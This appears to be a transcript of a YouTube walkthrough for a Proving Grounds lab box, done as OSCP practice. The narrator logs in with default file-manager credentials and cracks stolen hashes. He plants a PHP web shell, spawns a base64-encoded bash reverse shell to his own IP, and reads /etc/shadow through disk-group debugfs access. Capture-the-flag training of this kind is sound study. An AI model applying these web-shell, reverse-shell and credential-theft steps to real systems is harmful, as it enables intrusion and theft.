What's going on, YouTube? Welcome back to another video. In today's video, we are doing Extplorer from Proving Grounds practice. Now, this is a part of TJNulls OSCP Prep, and this is an intermediate level box. Although I don't think that this was actually intermediate level. Like, there was really not that much difficulty in this. You just had to know how to do your enumeration, you find default credentials, you get access to this file manager, and from there you just do a little bit more simple enumeration to get a hash, crack that hash, get on the box with a reverse shell, and then from there you can go ahead and see what groups you're a part of or that user is a part of, and then escalate privileges from there. So it was a pretty simple box as long as you know the fundamentals. That being said, let's just get right into it. So let's go ahead and start off with an nmap scan. Let's do sudo nmap, tach-sc for default scripts, tach-sv to enumerate the versions, tach-v to get some verbose output, and tach-on to output to a file, call it initial with this IP address, and we can go ahead and send that through, although I already did run this, so we could just take a look at what we've got here. So we do have port 22, which is SSH, it's running OpenSSH 8.2, and this does look like an Ubuntu server or a Linux server, right? And we do have port 80 as well, which is HTTP running Apache. So I'm assuming that PHP might be running on the back end. So that might be something to take a look at in just a moment. So it looks like we only have two ports here. We can go ahead and do sudo nmap tach-p-tach and then min rate of 10,000. And then I'll put this to a file of, well, actually, we don't even need to do that. Let's just go ahead and run this. And then we can see if there's any other ports open. Now, while that does run, let's go ahead and open this up. And I want to start a FFUF scan or a directory bus scan so we can get any enumeration done out of the way or any other directories that if we can't find anything on the actual web page, we can just go ahead and start looking at the things we find through here, right? So let's do FFUF and then tach-u http // the IP address with this fuzz parameter or keyword here, and then we can just do tach-w with opt-sec-list discovery web content, and then we can do raft small words dot text, and we can have that run. So it looks like we have WP admin, WordPress. We have a couple of things here. This might be a WordPress instance, file manager there. Let's go ahead and see if, or let's see what we get from port 80. Assuming that this loads anytime today, that'd be fantastic. Let's see, what else do we have here? We have WordPress, WP admin, WP content includes, file manager. We have a couple of hidden files here. Doesn't look like anything very useful. Considering the status codes of 403, we are forbidden. We cannot see these or access these files on the back end, right? So let's see what we got here. Okay, cool. So this looks like a WordPress setup config. So this is to set up the WP config file. Let's see if we can do this. That'd be great because we can then just we can just add our own database name, we can add our own username and password, and then just access the WordPress instance like that, right? We set it up ourselves basically. So let's just do random, and we can do a user of admin with a password of password 123, and let's see, localhost. Let's try localhost first, and we can do WP data like this. For the table prefix, we can go ahead and click enter here. And it says it's error establishing a database connection. So I guess that we can't run it off of localhost. Let's try localhost like this. Nope. Can we try, let's see, 127.0.0.1. Nothing there. Let's try the actual IP address. 2.168.167 and 16. Nothing there. That seems to be about it. It doesn't look like we can actually connect to the database instance, right? Or to the database. We don't have an established database connection to the backend server, at least from the WordPress standpoint. Now, we can go ahead and see what is in these other directories that we found here, the WP content, WP admin. So the WP admin is going to lead to this setup page right here, considering that there is no actual backend to this. There's no configuration to this. You see, it's right here. We have this error, and this most likely would not load, right? Let's go ahead and see if we have anything in content. Doesn't look like it. We go Control U. We don't have anything in the source code. We can try includes. We do have a couple of files here. We can see if maybe there is a database.php, database, nothing there. Users, nothing there. Password, application passwords, nothing there. So this doesn't look to be like anything of use, at least for us right now, right? We can see that there are some themes here, cron.php, but these are all just default WordPress application files, right? This is just a normal template of a WordPress instance. Even here in the users.php, there is nothing here. And so this is like not even set up yet, right? There's nothing in here. Now there is this file manager with a status of 301. So let's go ahead and take a look at what that is. So let's do file manager. And here we have this Extplorer, which I'm assuming is a file, sort of like a file server for like web applications, right? So we can do Extplorer PHP file manager. So that's what this is. Let's see, is there default credentials? So the default login for Extplorer is admin and admin. So let's go ahead and try that out. Admin, admin, enter. And we get in, so giving us a little warning on that our username and password is admin because it corresponds with the default to the privileged account. So we can go ahead and close that out. And we see here that we have all the WordPress files right here. We have WordPress, the WP admin, contents, everything that we saw in the FFUF scan, right? And then we have this file manager like folder for the actual file manager here. Let's go ahead and open this up, and I want to see if there might be any credentials in here, right? Let's go into the configuration file, and let's see what we have here, right? So, okay. DB host is going to be localhost, DB name, WEBDAV, root, and no password, and MySQL. So I'm assuming though this might just be a default configuration, like none of this actually exists or works. And WEBDAV, if I'm not mistaken, WEBDAV is a sort of how do you say it, an extension to HTTP that allows for users to sort of modify, upload, download, copy files over the HTTP protocol, or over the how do you say it, like the web application, right? You can try and connect to a WebDAV through, let's say, for example, this WebDAV client called Cadaver. So we could do Cadaver and then put the IP address and go from there. 302 found, but the collection is not open. We can try it with the file manager. And then webdav.php. Okay, cannot parse URL. Let's see, what about just file manager? Let's do this. Actually, let's exit out of this and let's try it with just file manager. And it can't parse the URL. So this doesn't have an active instance of WebDAV enabled, so we can't actually use this, although that could be something of use in other instances where you do see WebDAV. That is a pretty vulnerable protocol if it's not constrained, if the permissions are not constrained well, right? Or if there's not that much security involved with the WEBDAV instance or authentication for that matter, right? So this doesn't seem to matter that much. Let's go ahead and go back to the config. There is this htaccess, deny from all, and there is this htusers.php. And in this htusers.php, we can see that there is an array which is adding this admin and password. Let's go ahead, and this looks like MD5, so let's go ahead and copy this. Let's do crack station and input that here. So this is the admin password. Now let's go back, and this is for another user named Dora. Let's go ahead and grab this hash here. I believe this is a B2 crypt hash or a bcrypt hash, and we can do vi. Let's go into loot vi hash or Dora, and then we can do this, paste it in there, and we can do hash cat tech m. I believe it's 3200 Dora, and then opt rock u force. Let it run through. Okay, I already cracked this. So we could do show. And we have the password of Doraemon. So we can grab this. Let's go back. Let's go into creds, vi creds, and we can do Dora with this password here. And we can try and SSH into the box. So let's do SSH Dora at the IP address. Permission denied, public key. So we can't log into the SSH session because we don't have Dora's public key on our box, and we just don't have access to actually do remote management on the box right now. So another thing that we can do, since we have access to this WP or this WordPress instance, we know that WordPress runs PHP in the backend. So what we can do is go ahead and just put a PHP system call into one of these PHP files, and then just go ahead and execute that from the URL. Let's go into themes. We can do, let's see, let's cancel out of this right here. Let's just go into this PHP or this index.php. We can go ahead and close this PHP code off, and we can do system and then like this. And inside here, we can put $_request. So it does either a get or a post, and it's not just a get. Then we can do brackets like this. And inside these brackets, we can go ahead and put the, how do you say it? The parameter that we want to, is it parameter or, I believe so. Yeah, the parameter that we're going to use in order to execute commands. So we can do cmd or shell, whatever you want, right? So we can do cmd. That is done now. We can go ahead and save this. And if we go ahead and access this right here, we can do like this. We get nothing, right? Now, let's go ahead and add the parameter that we added, which is cmd, and then equals id. And we have command execution on the box. Awesome. Let's see, can we see who we are running as? I'm assuming that it's data, right? But we can see /cat /proc self cmd line. Okay, so I'm assuming that that file does not exist. It's just printing the actual file that we ran here. Let's see what else we have here. If we go back a second, we could do who am I? Yeah, and we're data. We could have seen that from here. I just wanted to see something else, right? Just to check. But yeah, so this being said, we have command execution here. Now we want to try and get a reverse shell on here, right? So let's go ahead and do echo -n, And then we can do bash tac I, and then add an extra space here to and dev tcp 192.168.45.151 and then 443, just assuming that there might be a firewall in play. This is normally a port that is allowed through a firewall, so we can go ahead and use that. And then we can just do 0, 2, and 1 like this with 2 spaces. And let's see what this prints out for us. Base 64, tac W0. And we do have an extra equal sign there, or extra little buffer. We can go ahead and add another space, and we are good. All of these are alphabetic characters. Go ahead and grab this. We can do echo and then this right here with base 64, tac D, and then pipe that to bash. What's going to happen here is that we're going to echo this base 64, and if we just do echo base 64-D, we can see that this gets executed, and then all we're going to do is send, or I mean, at least this gets unencoded from the base 64, and then we're just going to pipe this to bash to have it run immediately, and then we can do nc nvlp 443, go back, enter, hanging, go back here, and we have a shell as www data on the box, right? So that's fantastic. Now, we did have Dora's password, so we can try su Dora, Doraemon ID, and we're Dora now. Fantastic. Let's go ahead and do which Python. Let's go ahead and get a better shell. We can do Python 3, tac C, and then import pty.spawn. If I could spell, that'd be fantastic. Bin bash, like this. And we will, oh, I did forget something there, no wonder. Stu bin bash, like that. Boom. Now we can do Control Z to background this, and we could do stty raw minus echo with a semicolon FG to foreground it. Can enter, and then we can export term equals to x term, and we can clear the screen like that. Fantastic. Let's go into /home Dora. We do have the local.txt. Do we have SSH keys? We do not. That's fine. So one thing that we can try, right? Let's start a little bit of manual enumeration. Let's do sudo tac L. Let's go ahead and put in the password, Doraemon. Okay, so user Dora may not run sudo on localhost, so there's nothing there. We can try find, there you go, find perm 4000 to dev null. This is to find the SUID bits of different files that we can maybe take advantage of. Now, just off the bat, this doesn't really look like much. We don't have anything that's sort of out of the ordinary. All these seem to be default. At SU. Yeah, so all these are default SUID bits that are normal on a box. We can try SSNLTP to see if there's any ports running on localhost or any services running on localhost. And only 53, which is DNS, that's not really going to help us out that much. We don't have anything else on here. We can do a ID, and we can see that we are a part of the disk group. And so with the disk group, there is a privilege escalation method using debugfs, which is basically a file system debugger, right? If there's any problems, you can do debugfs, and then you can read file system like folders and files throughout it to sort of see where the problem lies, and you can do it as root. So that's fantastic. If we do which debugfs, which debugfs, there you go, we can see user sbin debugfs. If we copy this and do lsla on it, we can see that it's owned by root. And so that's what allows us to do everything basically as root. So let's go ahead and go back. Let's do disk group Linux privesc. Interesting groups. See if this loads. Here we go. Let's see. Disk. Here we go. Disk group. So right here, this privilege is almost equivalent to root access, as you can access all data inside of the machine. Basically, the first thing that you want to do is see all of the disks that are installed on the machine. So we could do df, and then here are all the file systems that are installed. And you can see that the root of the file system is mounted on this mount right here. So we can go ahead and copy this, grab it, right? And we're right here, we're using debugfs, and we are grabbing a file here. Although we don't really need to do this, we could just go ahead and view it from debugfs. So let's do debugfs with this mount, or this disk, and then now we're in the interactive mode here, and we can do cat etc shadow, right? And we could get the etc shadow file. So if we scroll up a little bit, we have the root password here. And go ahead and grab this entire string. Go down here, and we can do vi. Let's go back, cd loot, and then vi root. Go ahead and paste this in like that. And let's see. Before we do that, let's see. Can we access root's SSH keys? So let's do cd/root ls, and we do have proof.txt. So this is another way that you could have gotten it, just looking at the proof.txt. We do have an SSH here. Let's exit out of this, and let's do cd.ssh. We have authorized keys. Let's do cat authorized keys, and we don't get anything. I'm assuming that we might this might be empty, or we just don't have access to it. Although, let's see. Let's try this right here. Dump this into this. Okay. Let's do dump authorized keys into /temp, and then we can do root.text. Okay, now we can cat temp root.text, file not found. So apparently it's not there. Maybe this might be empty, and that's why there's nothing here that we can go ahead and take a look at. So let's go ahead and crack this hash that we have here. Let's do hashcat, and then what mode is that? That's SHA-512, I believe. Help, and then grep SHA-512. That is it 1700? No, 1800. Let's do that. Tech M 1800 root, and then opt rock u force. I already did crack this, so we can do show, and the password is Extplorer. So we can go ahead and grab this. We can exit out of this with Control Z, just background it, and then we can do su root with this password, and we are root on the box, just like that. Let's do cd/root, and then you can go ahead and grab the proof.txt. Now let's see cd.ssh. cat authorized keys. And yeah, it is empty. There's nothing in there. Just like that. So that is why we didn't get anything out of that. I'm not sure if there's a way to, I believe that you can only read files with debugfs. There's no way that you can actually put files, at least in my, oh, hold on. Note that you can also write files. So for example, to copy this to this, you can do this. Okay, let's try and do something here, right? Let's go back. Let's exit this. Let's do debug fs. Actually, do we have it here? Yeah. Let's do this, and let's go create our own root key. Let's do ssh key gen, tag f, and then root. No passphrase, doesn't matter, ls, and we have root and root.pub. Let's cat root.pub. Grab this here. Let's go ahead and let's see. I think first we have to create a file. So let's do cd/temp ls. There's a root.txt here. So let's vi root.txt. Nothing in here. Let's paste this. Actually, let's delete that. Set paste. Paste it in there. Okay, I think it's just the columns, the stty that's messed up, but that's fine. Should be fine. Let's go ahead and do this. Debug fs again. And let's dump. Let's see if this works. Dump and then temp root into /root. Root. There you go. .ssh. Authorized keys. Like this. Will this, hold on. Let's see. So for example, to copy this to this. Yeah, so I'm sure that'd be fine. Enter that. File not found. cd/temp. That's odd. It's weird. Let's see. We are in temp right now, and there is a root.txt. Let's go ahead and, okay, let's see. Maybe that temp isn't working. Let's see /home. Home. ls. Is there a Dora here? Okay, there is a Dora. So we can do that. Let's exit out of this. Let's move root.txt to /home Dora. There you go. Let's do this again. And let's dump /home Dora root.txt to /root.ssh authorized keys. Like this. Okay, there you go. So permission denied while opening root at authorized keys for dump inode. So we don't actually have permission to do that. If you try to write a file owned by root, you will have a permission denied error. So yeah, that isn't possible. It was worth the opportunity. Like in this case, if you did have permission to do this, like you can check somehow. But if you did have permission to do this, this might be a viable way to escalate privileges as well and get access to root through SSH. So that is the box. That is the entire thing. I hope you guys enjoyed. This was a pretty simple box, although it was an intermediate box. Fairly basic enumeration. You find default credentials and then go from there. But I hope you guys enjoyed. Thank you all for watching, and I'll see you guys in the next one.